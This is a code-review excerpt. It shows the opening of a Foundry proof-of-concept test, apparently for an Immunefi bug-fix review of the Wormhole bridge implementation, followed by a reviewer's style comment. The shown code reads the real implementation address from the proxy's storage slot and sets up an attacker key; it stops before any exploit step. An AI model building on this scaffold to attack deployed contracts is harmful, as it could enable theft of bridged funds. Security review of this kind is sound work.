src/Wormhole/WormholeBugFixReview.sol

```diff
@@ -0,0 +1,111 @@
+ // SPDX-License-Identifier: UNLICENSED
+pragma solidity ^0.8.0;
+
+import "@immunefi/PoC.sol";
+
+address constant wormholeImpl= 0x736D2A394f7810C17b3c6fEd017d5BC7D60c077d;
+
+interface IImplementation{
+    struct GuardianSet {
+        address[] keys;
+        uint32 expirationTime;
+    }
+    function isInitialized(address impl) external view returns (bool);
+    function initialize(
+        address[] memory initialGuardians,
+        uint16 chainId,
+        uint16 governanceChainId,
+        bytes32 governanceContract
+    ) external;
+    function getCurrentGuardianSetIndex() external view returns (uint32);
+    function getGuardianSet(uint32 index) external view returns (GuardianSet memory);
+    function submitContractUpgrade(bytes memory _vm) external;
+    function governanceChainId() external view returns (uint16);
+    function governanceContract() external view returns (bytes32);
+}
+
+
+
+contract WormholeBugFixReview is PoC {
+    address wormholeImplAddr;
+
+    address internal attacker;
+    uint256 attackerPrivateKey;
+
+    function initializeAttack() public {
+        console.log("\n>>> Initialize attack");
+       //Checking the deployed contract you can find the Implementation slot where the address is stored "0x360894a13ba1a3210667c828492db98dca3e2076cc3735a920a3ca505d382bbc"
+        bytes32 implementation = vm.load(wormholeImpl,0x360894a13ba1a3210667c828492db98dca3e2076cc3735a920a3ca505d382bbc); 
+        //Convert bytes32 to address:
+        wormholeImplAddr = address(uint160(uint256(implementation)));
+        console.log("Is a contract?", isContract(wormholeImpl));
+        string memory mnemonic = "test test test test test test test test test test test junk";
+        attackerPrivateKey = vm.deriveKey(mnemonic, 0);
+        attacker = vm.addr(attackerPrivateKey);
```

Comment:
Let's use `vm.makeAddr` here to clean this up https://book.getfoundry.sh/reference/forge-std/make-addr eg.

```
vm.makeAddr("attacker");
```